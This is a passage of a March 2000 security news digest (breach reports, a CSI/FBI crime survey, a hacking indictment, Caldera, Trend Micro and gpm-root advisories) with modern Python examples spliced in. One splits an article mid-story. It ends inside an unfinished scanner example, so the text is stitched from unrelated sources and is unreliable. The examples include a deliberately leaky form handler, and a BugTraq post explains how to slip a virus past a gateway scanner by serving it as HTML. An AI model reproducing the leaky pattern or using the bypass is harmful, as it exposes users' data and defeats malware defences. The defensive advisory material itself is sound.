Consumers who requested online life insurance quotes from the SelectQuote Web site on Tuesday and Wednesday were apparently victimized by a software glitch, which caused their personal information to be left on the company's Web site, wide open.

Link: Security Watch
http://www.securitywatch.com/scripts/news/list.asp?AID=2324

Insurance site exposes sensitive customers' data (03/23/2000)

Consumers who requested online life insurance quotes from the SelectQuote Web site on Tuesday and Wednesday were apparently victimized by a software glitch, which caused their personal information to be left on the company's Web site, wide open. The security glitch in the software SelectQuote uses would have occurred when a form that consumers fill out to request a quote failed to clear the contents at the end of the process.
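The kind of glitch described here, as an added illustration (hypothetical handlers, not SelectQuote's software): a quote form whose field values live in one server-side dict shared by every visitor and never cleared, beside a version that builds the form fresh for each request, with a check that reports which fields leak from one visitor to the next.

```python
from typing import Callable, Dict, List

# Fields the constructed quote form collects (the categories the article says were exposed).
FIELDS = ("name", "address", "current_coverage", "parent_health_history")

# Vulnerable pattern: one module-level form object reused for every request and never
# cleared when a quote finishes, so whatever the previous visitor typed is still in it.
_shared_form: Dict[str, str] = {field: "" for field in FIELDS}


def render_quote_form_vulnerable(submitted: Dict[str, str]) -> Dict[str, str]:
    """Merge this visitor's fields into the shared form and return the page contents."""
    _shared_form.update({k: v for k, v in submitted.items() if k in FIELDS})
    return dict(_shared_form)  # fields this visitor left blank still carry the last user's values


def render_quote_form_fixed(submitted: Dict[str, str]) -> Dict[str, str]:
    """Start from a blank form on every request; only this visitor's own data can appear."""
    form = {field: "" for field in FIELDS}
    form.update({k: v for k, v in submitted.items() if k in FIELDS})
    return form


def leaked_fields(first: Dict[str, str], second: Dict[str, str],
                  handler: Callable[[Dict[str, str]], Dict[str, str]]) -> List[str]:
    """Run two visitors through `handler` in turn and list the fields on the second
    visitor's page that show the first visitor's (non-empty) value."""
    handler(first)
    page = handler(second)
    return [f for f in FIELDS
            if f not in second and page[f] != "" and page[f] == first.get(f, "")]


# Constructed visitors: Alice completes the form; Bob has typed only his name so far.
ALICE = {
    "name": "Alice Example",
    "address": "1 Constructed Lane",
    "current_coverage": "none",
    "parent_health_history": "constructed: heart disease",
}
BOB = {"name": "Bob Example"}

if __name__ == "__main__":
    print("vulnerable leaks:", leaked_fields(ALICE, BOB, render_quote_form_vulnerable))
    print("fixed leaks:     ", leaked_fields(ALICE, BOB, render_quote_form_fixed))
```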
This resulted in all personal information (name, address, current coverage and parents' health histories) from the previous user being plainly exposed to the next person requesting a quote. @HWA 79.0 HNS:Mar 23rd:ALTERING WEB SITES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 5:32 PM A Gore computer business has beefed up its security after a Brazilian hacker got into one of the websites and defaced it. Link: The Press NZ http://www.press.co.nz/2000/12/000323x04.htm Hacker breaches security to alter Alexandra website text By Sonia Gerken A Gore computer business has beefed up its security after a Brazilian hacker got into one of the websites it manages and changed the text. Clive Wilson Computers Gore managing director Ewen Whitefield said yesterday the security breach of its domain hosting machine last month was low level, but "anyone hacking into our machines is serious." The hacker changed text on the website of an Alexandra client. Police had been notified of the breach and the company was unlikely to pursue it further. "It annoys us more than anything else. If it was a major security breach we could chase it back to the United States and Brazil," Mr Whitefield said. If anything the breach proved the company's electronic "firewalls" were pretty good, stopping the hacker from getting any further than minimal damage, he said. Website designer Ken France, of Arthurton, said the hacker probably found a "tiny little hole" to sneak in through. It was an old site, designed two years ago. The breach was annoying and nothing serious - "apart from getting a laugh at our expense," he said. There was a big rush of "hits" to the site after the first hacker got in. Within a week 200 hits more than usual were logged and three or four of those had changed some text, Mr France said. "Some even put their telephone number in. "It was like 'If you want to know how I got in here give me a call'," he said. 
The company was warned about the hacking by a phone call from someone claiming to be a website watcher in Australia. Mr France said the call came an hour after he had looked at the website and it was all right.

"It's quite strange how they knew. I suspect it was bogus."

Mr Whitefield said the company received an e-mail the day after the hacking from the Brazilian Internet Society asking questions about the hacker. There was no way to verify the authenticity of the e-mail, he said.

Mr France said the company's tighter security had been effective. At times he had been unable to get into sites he designed that were managed by the company.

"It's good in a way. If I can't get in, how will anyone else," he said.

@HWA

80.0 HNS:Mar 23rd:SECURITY BREACHES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ
Thursday 23 March 2000 on 5:28 PM

More than 90 percent of large corporations and government agencies were the victims of computer security breaches in 1999, according to a new survey.

Link: APB News
http://www.apbnews.com/newscenter/internetcrime/2000/03/22/crimesurvey0322_01.html

9 of 10 Companies Report Computer Attacks
Survey Finds Damages Triple as Cybercrime Booms

March 22, 2000
By David Noack

SAN FRANCISCO (APBnews.com) -- More than 90 percent of large corporations and government agencies were the victims of computer security breaches in 1999, according to a new survey.

The Computer Security Institute's fifth Computer Crime and Security Survey also found that the total reported financial losses have tripled.

The annual survey is conducted with the participation of the San Francisco FBI Computer Intrusion Squad and aims to increase awareness of security.

This year's survey was based on responses from 643 computer-security professionals in U.S. corporations, government agencies, financial institutions, medical institutions and universities.
Only 42 percent of those answering the survey could put a dollar figure on their financial losses -- reporting the total at $265 million. The average annual total over the last three years was $120 million.

Widespread and diverse

Patrice Rapalus, director of the Computer Security Institute, said the survey points to a disturbing trend.

"Cybercrimes and other information-security breaches are widespread and diverse," she said. "Ninety percent of respondents reported attacks. Furthermore, such incidents can result in serious damages. ... Clearly, more must be done in terms of adherence to sound practices, deployment of sophisticated technologies, and most importantly, adequate staffing and training of information-security practitioners in both the private sector and government."

The survey also found:

- 70 percent reported a variety of serious computer security breaches other than the most common ones of computer viruses, laptop theft or employee "net abuse." Other examples included theft of proprietary information, financial fraud, system penetration from outsiders, denial of service attacks and sabotage of data or networks.

- 74 percent acknowledged financial losses due to computer breaches.

- 71 percent of respondents detected unauthorized access by insiders.

- For the third year in a row, more respondents -- 59 percent -- cited their Internet connection as a frequent point of attack rather than their internal systems -- 38 percent.

Financial losses larger

The report said the financial losses in eight of 12 categories were larger than in any previous year. In addition, financial losses in four categories were higher than the combined total of the three previous years.

For example, 61 respondents quantified losses due to sabotage of data or networks for a total of $27 million. The total financial losses due to sabotage for the previous years combined totaled only $10 million.
As in previous years, the most serious financial losses occurred through theft of proprietary information, with 66 respondents reporting losses of $66 million, and financial fraud, with 53 reporting $55 million in losses.

The survey results show that computer crime threats to large corporations and government agencies come from both inside and outside their electronic perimeters, confirming trends found in prior surveys.

Bruce J. Gephardt heads the FBI's Northern California office in San Francisco, which covers 15 counties, including Silicon Valley. He said the survey helps him decide how to deploy his forces instead of reacting to computer crises as they occur.

Trends and crises

"The results of the CSI/FBI survey provide us with valuable data," Gephardt said. "This information not only has been shared with Congress to underscore the need for additional investigative resources on a national level, but [it] identifies emerging crime trends and helps me decide how best to proactively and aggressively assign resources before those 'trends' become 'crises.'"

CSI, which was established in 1974, is a San Francisco-based association of information-security professionals.

The FBI, responding to an increase in the criminal targeting of major components of information and economic infrastructure systems, has established the National Infrastructure Protection Center (NIPC), which is located at FBI headquarters, and the Regional Computer Intrusion Squads, which are located in selected offices throughout the United States.

The NIPC, a joint partnership among federal agencies and private industry, is designed to serve as the government's lead mechanism for preventing and responding to cyberattacks on the nation's infrastructure.
The Regional Computer Intrusion Squads investigate violations of the Computer Fraud and Abuse Act, which includes intrusions to public switched networks, major computer network intrusions, privacy violations, industrial espionage, pirated computer software and other crimes.

David Noack is an APBnews.com staff writer (david.noack@apbnews.com).

@HWA

81.0 HNS:Mar 23rd:ATTACK COSTS RISE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ
Thursday 23 March 2000 on 3:29 PM

In an annual survey issued on Wednesday, the FBI and the San Francisco-based Computer Security Institute showed just how pressing: total verifiable losses in 1999 more than doubled to top $265 million, while more than 90 percent of respondents reported detecting some form of security breach.

Link: CNNfn
http://cnnfn.com/2000/03/22/technology/wires/hackers_losses_wg/

Hacker attack costs rise
FBI, CSI: Verifiable losses due to poor security top $265M in 1999

March 22, 2000: 7:30 a.m. ET

SAN FRANCISCO (Reuters) - In a year that saw some of the Internet's best known sites seriously hit by hacker attacks, few computer users would question that cyber-security is a pressing concern.

In an annual survey issued on Wednesday, the FBI and the San Francisco-based Computer Security Institute showed just how pressing: total verifiable losses in 1999 more than doubled to top $265 million, while more than 90 percent of respondents reported detecting some form of security breach.

Security experts say a large number of attacks go unrecognized, and the total is hard to assess, with companies reluctant to admit they've been vandalized. But the annual survey gives a clear picture of a worsening problem.

"The trends are continuing in the same direction. It's going from bad to worse in terms of threats from the outside, while the threat from the inside doesn't go away," said Richard Power, CSI's editorial director.
The fifth annual survey of computer crime and security polled some 640 corporations, banks and government organizations about the state of their computer systems.

Only 42 percent of these respondents could put a dollar figure on what the attacks cost them -- but this figure, at $265 million, was more than double the average annual total over the last three years.

While the most common threats -- computer viruses, laptop theft, or employee "net abuse" -- continued apace, at least 74 percent of respondents reported more serious security breaches including theft of proprietary information, financial fraud, system penetration by outsiders, data or network sabotage, or "denial of service" attacks designed to take websites out of commission.

Information theft and financial fraud caused the most severe financial losses, put at $68 million and $56 million respectively.

But "denial of service" attacks, like the ones that temporarily paralyzed Yahoo!, eBay, Buy.com, and several other websites in February, are also a growing problem, Power said.

Losses traced to denial of service attacks were only $77,000 in 1998, and by 1999 had risen to just $116,250. The new survey, which reports on numbers taken before the high-profile February strikes, showed quantified losses up at more than $8.2 million.

"The denial of service showed that many sites are way, way understaffed and not adequately secured," Power said. "Maybe a half a dozen sites were attacked in that attack, and 150 sites were hacked into to launch the attack. There is a widespread insecurity among corporate sites and government sites and the problem is not just technological, it is human. There are not enough people working on it."

Bruce Gephardt, in charge of the Federal Bureau of Investigation's northern California office, said the survey revealed how quickly computer security is becoming a major problem faced by law enforcement, and how more staff was needed to fight it.
"If the FBI and other law enforcement agencies are to be successful in combating this continually increasing problem, we cannot always be placed in a reactive mode, responding to computer crises as they happen," Gephardt said in a news release. @HWA 82.0 HNS:Mar 23rd:INDICTED FOR HACKING NASA SERVERS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 3:28 PM A suspected computer hacker made his first court appearance Wednesday after being indicted on charges of breaking into computers belonging to NASA and the U.S. departments of energy, defense and transportation, said federal prosecutors. Link: Miami Herald http://www.herald.com/content/today/business/brkdocs/079991.htm Posted at 11:58 p.m. EST Wednesday, March 22, 2000 Man indicted after allegedly hacking into government computers SAN FRANCISCO -- (AP) -- A suspected computer hacker made his first court appearance Wednesday after being indicted on charges of breaking into computers belonging to NASA and the U.S. departments of energy, defense and transportation, said federal prosecutors. Max Ray Butler, 27, of Berkeley was ordered held on $100,000 bail during the hearing in San Jose. On March 15, he was indicted on 15 criminal counts, including unauthorized access of a computer, recklessly causing damage and interception of electronic communication. All the counts carry sentences of at least six months and fines of hundreds of thousands of dollars. Butler, who also goes by the name of Max Vision, had been an FBI source, helping agents solve computer crimes, authorities said. He turned himself in on Tuesday. Butler's attorney did not return a telephone call seeking comment. 
@HWA

83.0 HNS:Mar 23rd:CALDERA SYSTEMS SECURITY ADVISORY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by LogError
Thursday 23 March 2000 on 12:19 PM

The OpenLinux package contains a CGI script called rpm_query that allows a user to obtain a list of all RPM packages installed on that machine, provided the Apache Web server is running. This could be used by an intruder to determine what part of the system to attack.

Link: Linux Today
http://linuxtoday.com/stories/18850.html

Caldera Systems Security Advisory: rpm_query allows everyone to list installed rpms
Mar 22, 2000, 23:23 UTC (0 Talkbacks)

                    Caldera Systems, Inc.  Security Advisory

Subject:           rpm_query allows everyone to list installed rpms
Advisory number:   CSSA-2000-007.1
Issue date:        2000 March, 8
Last change:       2000 March, 14
Cross reference:

1. Problem Description

   The OpenLinux package contains a CGI script called rpm_query that allows a user to obtain a list of all RPM packages installed on that machine, provided the Apache Web server is running. This could be used by an intruder to determine what part of the system to attack.

2. Vulnerable Versions

   System                   Package
   -----------------------------------------------------------
   OpenLinux Desktop 2.3    All packages previous to OpenLinux-2.3-17
   OpenLinux eServer 2.3    All packages previous to OpenLinux-2.3-24S

3. Solution

   Workaround:

   Remove the script by executing:

      rm -f /home/httpd/cgi-bin/rpm_query

   The proper solution is to upgrade to the latest packages.

4. OpenLinux Desktop 2.3

   4.1 Location of Fixed Packages

   The upgrade packages can be found on Caldera's FTP site at:

      ftp://ftp.calderasystems.com/pub/openlinux/updates/2.3/current/RPMS

@HWA

84.0 HNS:Mar 23rd:REMOTE SECURITY MANAGEMENT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by LogError
Thursday 23 March 2000 on 12:14 PM

Businesses can have their network security hosted and managed remotely using a new service from Network Associates.
The company's myCIO.com service offers an ASP 'infrastructure' which allows partners such as ISPs, telecoms providers and even computer resellers to host NAI's products and services online.

Link: VNUNET
http://www.vnunet.com/News/601120

@HWA

85.0 HNS:Mar 23rd:"ANTI-ARAB" BUG
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ
Thursday 23 March 2000 on 3:29 AM

The head of Microsoft's European and Middle East operations said on Wednesday the firm was fixing a bug in its Windows 2000 French-language spell-checker which suggested replacing "anti-stress" with the word "anti-arab."

Link: Wired
http://www.wired.com/news/politics/0,1283,35117,00.html

MS Fixing 'Anti-Arab' Bug
Reuters
7:00 a.m. Mar. 22, 2000 PST

PARIS -- The head of Microsoft's European and Middle East operations said on Wednesday the firm was fixing a bug in its Windows 2000 French-language spell-checker which suggested replacing "anti-stress" with the word "anti-arab."

Michel Lacombe, president of Microsoft EMEA, said the problem should be fixed in "a few weeks" and that customers would be offered a new version free of charge.

"Microsoft is very sorry about this. We are always sensitive to things which confuse people and we are very respectful of people getting hurt," Lacombe told Reuters.

"Microsoft has no problem with the Arab world, we invest in the Arab language, and in Arab countries. Our software developers are looking at a way to fix this and in a few weeks this will be behind us," he added.

France's national CFDT trade union denounced Microsoft for its "racist turn of phrase."

"As it is not able itself to go directly to court, the CFDT is informing national anti-racism societies. It will support any criminal action they should take," the CFDT said in a statement.

Lacombe noted that the bug was in its spell-checker, not its thesaurus. "That would be worse. We are not trying to give a synonym of anti-stress, just to help the user solve a spelling problem," he said.
@HWA

86.0 HNS:Mar 23rd:OFFICE 2000 PATCHES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ
Thursday 23 March 2000 on 3:28 AM

Microsoft posted Service Release 1 (SR-1) to the Web for download. It is the first collection of patches and fixes for Office 2000 since the product began shipping last June.

Link: Microsoft
http://officeupdate.microsoft.com/default.asp

@HWA

87.0 HNS:Mar 23rd:SHARING INFORMATION
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ
Thursday 23 March 2000 on 3:16 AM

A new bill aimed at encouraging companies to share information about hacker attacks would provide firms with a limited exemption from the Freedom of Information Act.

Link: NewsBytes
http://www.newsbytes.com/pubNews/00/146086.html

Bill Would Protect Firms That Share Hacking Info
By David McGuire, Newsbytes

WASHINGTON, DC, U.S.A., 21 Mar 2000, 6:00 AM CST

A new bill aimed at encouraging companies to share information about hacker attacks would provide firms with a limited exemption from the Freedom of Information Act (FOIA).

Set to be introduced by Reps. Tom Davis, R-Va., and Jim Moran, D-Va., later this week, the legislation would allow companies to share information about cyberattacks with law enforcers and industry groups, without worrying that such information could come back to haunt them, Davis staffer David Marin said today.

"The public interest will be served by companies coming forth to share their information" about attacks, Marin said. Too often now companies do not report cyberattacks for fear that such reports will find their way into the media, he said.

While the bill would create a limited shelter under FOIA, it is not intended to allow companies to mask their business dealings, Marin said.

When the legislation is completed it will be "narrowly tailored to address (information pertaining to) how the attack was done and what was done to fix the attack," Marin said.
The legislation will apply only to telecommunications and information technology infrastructure attacks.

Used primarily by the media, FOIA allows members of the press and the public to file legally binding requests for public documents. FOIA already contains an exemption for ongoing criminal investigations, but Davis and Moran are aiming to further protect firms that divulge information about cyberattacks, Marin said.

Reported by Newsbytes.com, http://www.newsbytes.com .

@HWA

88.0 HNS:Mar 23rd:MONITORING WITH GOOD RESULTS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ
Thursday 23 March 2000 on 2:31 AM

A federal appeals court has upheld a CIA policy allowing agency officials to monitor employees' Internet use. The policy had helped convict a federal employee of downloading child pornography on government time.

Link: GovExec article
http://www.govexec.com/dailyfed/0300/032000m1.htm

Link: US vs. Simons - court's decision
http://www.law.emory.edu/4circuit/feb2000/994238.p.html

GovExec; March 20, 2000

DAILY BRIEFING

Court upholds agency reviews of employees' Internet use
By Kellie Lunney
klunney@govexec.com

A federal appeals court has upheld a CIA policy allowing agency officials to monitor employees' Internet use. The policy had helped convict a federal employee of downloading child pornography on government time.

The CIA's Foreign Broadcast Information Service implemented a policy in June 1998 authorizing "electronic audits" of employee computers in order to crack down on non-business related Internet use. Those audits included reviewing employees' e-mail messages and collecting information on their Web site visits.

Later that summer, Science Applications International Corp. (SAIC), which had a contract to manage FBIS' computer network and monitor inappropriate Internet behavior, alerted the agency when the keyword "sex" turned up numerous hits in a firewall database during a routine test.
The hits originated from the computer of Mark L. Simons, an electronic engineer at FBIS. FBIS officials then searched Simons' computer and office on four occasions, eventually compiling enough evidence to indict him on two counts of knowingly receiving and possessing child pornography downloaded from the Internet and stored on his government hard drive.

Simons claimed that his Fourth Amendment rights had been violated during the searches. But a district court upheld the searches. Simons was found guilty and was sentenced to 18 months in jail.

The U.S. Court of Appeals for the Fourth Circuit affirmed that decision in late February, saying that Simons failed to prove that he had a "legitimate expectation of privacy in the place searched or the item seized."

According to the appeals court, "In the final analysis, this case involves an employee's supervisor entering the employee's government office and retrieving a piece of government equipment in which the employee had absolutely no expectation of privacy [due to the agency's Internet policy]—equipment that the employer knew contained evidence of crimes committed by the employee in the employee's office ... Here, there was a conjunction of the conduct that violated the employer's policy and the conduct that violated the criminal law."

The court's decision in USA v. Simons (99-4238) is online at www.law.emory.edu/4circuit/feb2000/994238.p.html.

@HWA

89.0 HNS:Mar 23rd:CRIME FIGHTING LAB
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ
Thursday 23 March 2000 on 2:15 AM

With an eye toward cracking down on cyber crime, officials at the College of DuPage on Monday unveiled a new state-of-the-art computer lab at the college's Suburban Law Enforcement Academy.
Link: Chicago Tribune
http://www.chicagotribune.com/news/metro/dupage/printedition/article/0,2669,SAV-0003210202,FF.html

FIGHTING CRIME ON COMPUTER
LAB GIFTS LET COLLEGE OFFER CLASS FULL-TIME

By LeAnn Spencer
Tribune Staff Writer
March 21, 2000

With an eye toward cracking down on cyber crime, officials at the College of DuPage on Monday unveiled a new state-of-the-art computer lab at the college's Suburban Law Enforcement Academy.

There, officers will learn how to track computer criminals, from pedophiles who prey on children to shysters out to bilk people of money to hackers who infiltrate confidential Web sites.

The lab at the Glen Ellyn school also will train officers in how to conduct on-line investigations, in computer modeling that will enable them to reconstruct a crime scene, and in how to present the evidence in court.

The new lab was made possible by a donation from Microsoft Corp. and Omni Tech Corp. of 51 new personal computers, screens and keyboards; a printer and overhead projector; all the necessary software; and technical support services.

The equipment and software are valued at $250,000, college officials said, and enable the college to create one of the nation's few specialized computer crime labs dedicated to training law enforcement personnel. No civilians will be able to enroll in the 40-hour, weeklong classes, which will cost $475 in tuition.

"The industry is very motivated in learning how to tackle the problems" of computer crime, Bob Herbold, executive vice president and chief operating officer of Microsoft, said at a Monday unveiling of the lab.

Until now, the law-enforcement academy has held its computer crime classes by borrowing computer space elsewhere on campus, and only when regular classes were out of session. The new computer lab allows the academy to offer classes virtually year-round, reaching literally hundreds of officers and prosecutors.
Already, the academy is receiving attention from police departments all over the country, as well as Canada, officials said.

College officials said that there is a real need for the training as police and prosecutors struggle to keep pace with the sometimes confusing world of computer crime.

"When this was brand-new technology, it was difficult for police departments to follow up," said Mike Sullivan, Naperville police detective and an instructor at the law enforcement academy.

But understanding the inner workings of computers and the Internet, officials said, is no different than learning any kind of new technology, whether it be fingerprinting or the use of DNA evidence.

One unusual aspect of the lab will be that the police officers in the class will be able to pose as children and log on to pornographic Web sites or chat rooms where Internet users prey on the young. As pedophiles reveal themselves, they can be investigated and arrested, officials said.

"It used to be that pedophiles would go to the park and pick their victims," Sullivan said. "As the Internet came along, the Internet has become the virtual park."

Such real-life training is invaluable. "There's no place else that you can go in and see a felony being committed while you are doing police training," Sullivan said.

Sullivan noted that many people wrongly think what they do on the Internet cannot be traced.

"When a crime is committed on the Internet, it makes it easier for us to track you. It's like committing a crime and then leaving your license plate at the scene," he said.

"You can't go on the Internet," he said, "without leaving a footprint."
@HWA

90.0 HNS:Mar 23rd:HUNTING CROATIAN PIRATES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ
Thursday 23 March 2000 on 1:49 AM

Three days ago, the first coordinated police action against software pirates in Croatia resulted in the confiscation of more than 47 computers, 8536 CDs, 2602 floppy disks and nearly $1 million worth of software.

Link: Bug On-line (Croatian language)
http://www.bug.hr/vijesti/index.asp?datum=22032000#id3268

@HWA

91.0 HNS:Patch available for OfficeScan vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 24, 2000

Trend Micro has released a patch that eliminates server security vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier versions, running on Windows NT 4 server with Internet Information Server (IIS). ...

Patch available for OfficeScan vulnerability
Posted to BugTraq on March 24, 2000

Security Focus BugTraq ID: 1057
Posted: March 22, 2000

Summary
=======

Trend Micro has released a patch that eliminates server security vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier versions, running on Windows NT 4 server with Internet Information Server (IIS).

These versions of OfficeScan allow intruders within a firewall to invoke OfficeScan CGIs on the server without authentication - bypassing OfficeScan management console password protection. These OfficeScan CGIs are intended for administrators to manage OfficeScan antivirus running on networked workstations via the OfficeScan management console. By gaining access to execute these CGIs, hackers can use them to change OfficeScan antivirus configurations or to uninstall OfficeScan antivirus on the desktops.

Issues
======

Trend OfficeScan version 3.51 or earlier versions apply inadequate security settings on the OfficeScan server CGI components.
If a malicious user has the ability to connect to the OfficeScan server via a web browser, these CGIs can be executed to send valid commands - including the uninstall command - to OfficeScan clients.

In addition, OfficeScan's implementation of user authentication in its management console - password protection - was insufficiently encrypted, and allows a malicious user to decrypt and gain access to the OfficeScan management console.

Implementation
==============

Trend Micro has released a patch that will secure access to the OfficeScan CGIs on the server. The patch program changes the file permissions on the OfficeScan CGIs, so only administrators can access and execute them. This patch works only on drives formatted to use the Windows NT file system (NTFS).

After applying this patch, hackers will no longer be able to remotely invoke OfficeScan CGIs without being authenticated as an administrator by NTFS security. This patch also prevents hackers who sniff for the OfficeScan management console password over the network from gaining access to the OfficeScan management console. Access to the OfficeScan management console, and execution of the OfficeScan CGIs, now require NTFS authentication.

Affected Software Versions
==========================

Trend OfficeScan Corporate Edition 3.0
Trend OfficeScan Corporate Edition 3.11
Trend OfficeScan Corporate Edition 3.13
Trend OfficeScan Corporate Edition 3.50
Trend OfficeScan Corporate Edition 3.51
Trend OfficeScan for Microsoft SBS 4.5

This vulnerability is only present when the above software versions are installed on a Windows NT server with IIS. It is not present when the above software versions are installed on Novell NetWare servers or on a Windows NT server without IIS.

Patch Availability
==================

The OfficeScan Unauthenticated CGI Usage patch can be downloaded from:
http://www.antivirus.com/download/ofce_patch.htm

More Information
================

Please see the following references for more information related to this issue.
- Trend Micro Security Bulletin:
  http://www.antivirus.com/download/ofce_patch_351.htm

- Frequently Asked Questions: Trend Micro Knowledge Base
  http://solutionbank.antivirus.com/solutions/faqResult.asp?product=8

Obtaining Support on this Issue
===============================

This is a fully supported patch. Information on contacting Trend Micro Technical Support is available at http://www.trend.com/support/default.htm

Acknowledgements
================

Trend Micro thanks Gregory Duchemin (http://www.securite-internet.com) and Elias Levy (http://www.securityfocus.com) for reporting the OfficeScan server vulnerability to us, and working with us to protect our customers.

@HWA

92.0 HNS:Gpm-root problems
~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 23, 2000

When the user selects one of his/her favourite utilities from his/her own list, gpm-root starts this process with the group and supplementary groups of the gpm-root daemon ...

Gpm-root problems
Posted to BugTraq on March 23, 2000

I've sent a report about the following security hole to the authors of gpm, but they seemed to ignore the problem.

The problem applies to every gpm version known to me, for example 1.18.1 and 1.19.0.

To exploit this problem, gpm-root must be running on a machine and the user needs both a login on that machine and physical access to the keyboard and mouse.

gpm-root is a beautiful tool shipped in the gpm package. It pops up beautiful menus based on each user's own config file when Ctrl+Mousebutton is pressed on the console. When the user selects one of his/her favourite utilities from his/her own list, gpm-root starts this process with the group and supplementary groups of the gpm-root daemon.

gpm-root calls setuid() first and setgid() afterwards, hence the latter one is unsuccessful. The authors completely forgot about calling initgroups().
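The ordering bug described in the report, written out as the correct sequence in code. This is an added example and not part of Egmont Koblinger's post or of the gpm package: a root daemon that wants to run a helper as an unprivileged user has to shed supplementary groups first (initgroups()), then the primary group (setgid()), and give up the uid last, checking every return value. The "nobody" account used by the demo's main() is an assumption; the Linux-specific getresuid()/getresgid() calls are used for the final verification.

```python
"""Dropping root privileges in the order that actually works (Linux).

Added example for the gpm-root report above; not code from the gpm package
or from the BugTraq post.  A root daemon that runs a helper as an
unprivileged user must give up identity in this order:

  1. supplementary groups  (initgroups(), needs root)
  2. primary group         (setgid(), needs root)
  3. user id               (setuid(), last, because it is what gives root away)

The report describes gpm-root calling setuid() first: the setgid() that
follows then fails with EPERM, and because the return value was not checked
the helper kept the daemon's group memberships.  Every step below is checked
and any failure raises, so a caller can never carry on half-dropped.
"""
from __future__ import annotations

import os
import pwd


def current_ids() -> tuple[int, int]:
    """Real uid and gid of the running process."""
    return os.getuid(), os.getgid()


def identity_is(uid: int, gid: int) -> bool:
    """True only when real, effective AND saved ids all equal the target.

    Checking os.getuid()/os.getgid() alone would miss a leftover saved id
    that the process could later switch back to (Linux-specific calls).
    """
    return os.getresuid() == (uid, uid, uid) and os.getresgid() == (gid, gid, gid)


def drop_privileges(user: str) -> tuple[int, int]:
    """Become `user` permanently.  Returns (uid, gid); raises on any failure."""
    pw = pwd.getpwnam(user)          # KeyError if the account does not exist
    uid, gid = pw.pw_uid, pw.pw_gid
    # 1. Replace the supplementary group list with the target user's groups.
    #    This is the call the report says gpm-root never made.
    os.initgroups(user, gid)
    # 2. Primary group, while we still hold the privilege to change it.
    os.setgid(gid)
    # 3. Only now give up the uid.
    os.setuid(uid)
    # 4. Do not trust the calls alone; confirm there is no way back.
    if not identity_is(uid, gid):
        raise RuntimeError("privilege drop incomplete; refusing to continue")
    return uid, gid


def try_drop(user: str) -> str:
    """Outcome of drop_privileges() as a word, for the demo and the tests.

    'refused' is what an unprivileged process gets (initgroups() and setgid()
    need root); the important property is that it is reported, not ignored.
    """
    try:
        drop_privileges(user)
        return "dropped"
    except KeyError:
        return "unknown user"
    except PermissionError:
        return "refused"


if __name__ == "__main__":
    import sys
    # "nobody" is an assumed target account; pass another name as argv[1].
    target = sys.argv[1] if len(sys.argv) > 1 else "nobody"
    print(f"{target}: {try_drop(target)}; now uid={os.getresuid()} gid={os.getresgid()}")
```

Run as root it drops to the named account and prints the resulting ids; run unprivileged it reports "refused" rather than silently continuing, which is the behaviour the gpm-root code lacked.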
Egmont Koblinger

@HWA

93.0 HNS:Esafe Protect Gateway (CVP) problems
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 22, 2000

The Esafe Protect Gateway (ESPG) does not scan some files in combination with FireWall-1 and CVP ...

Esafe Protect Gateway (CVP) problems
Posted to BugTraq on March 22, 2000

After notification of the manufacturer here is the full report on a problem noted with Esafe Protect Gateway.

SUMMARY
-------

The Esafe Protect Gateway (ESPG) does not scan some files in combination with FireWall-1 and CVP.

DETAILS
-------

If you want the Esafe Protect Gateway to scan all content for the presence of a virus you have two options.

1. Choose to scan anything not listed in the 'safe file types' list. And then clear out all entries in that list.

2. Choose to scan only files listed in the 'dangerous file types' list. And then have only one extension listed, namely '*'.

Deciding to rely on extensions seems an indication of a flawed design already. Renaming files is a common practice and can be done by anyone capable of operating a keyboard.

The problem is that anything with the MIME type set to TEXT/HTML will not be scanned regardless of the options recommended above.

A simple test was capable of pointing this out. Set up a default Apache server. Copy a virus file to two locations, being http://website/test1.txt and http://website/test1.html, and try to download them with your favorite browser. The URL is unique and was never used by your browser to minimize the possibilities of caches being in place. But forced reloads work properly and are sufficient if you want to replicate this issue.

Downloading http://website/test1.html does nothing to detect the virus and it is yours. No protection is offered. Downloading http://website/test1.txt will not work as ESPG will now intercept the file containing the virus.
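The defensive lesson in the test above is that the skip decision was keyed on a label (the declared MIME type, or a file extension) that the serving side controls. The following is an added example, not Esafe's, Check Point's or the poster's code: a scan-gating policy keyed on what the first bytes of the download look like, with the declared type and extension only compared against that, so that a mislabelled or renamed file is scanned rather than waved through. The signature table, the extension map and the sample bodies are small constructed stand-ins.

```python
"""Gating a gateway virus scan on content, not on labels.

Added example for the Esafe Protect Gateway report above (not vendor code
and not from the post).  Anything whose declared type or extension disagrees
with its bytes is scanned; the skip list applies only to the sniffed type.
"""
from __future__ import annotations

import re

# Constructed magic-byte table: (prefix, type the body is treated as).
SIGNATURES = (
    (b"MZ", "application/x-dosexec"),      # DOS/Windows executables
    (b"\x7fELF", "application/x-elf"),      # Unix executables
    (b"PK\x03\x04", "application/zip"),     # zip, and jar/docx/... built on it
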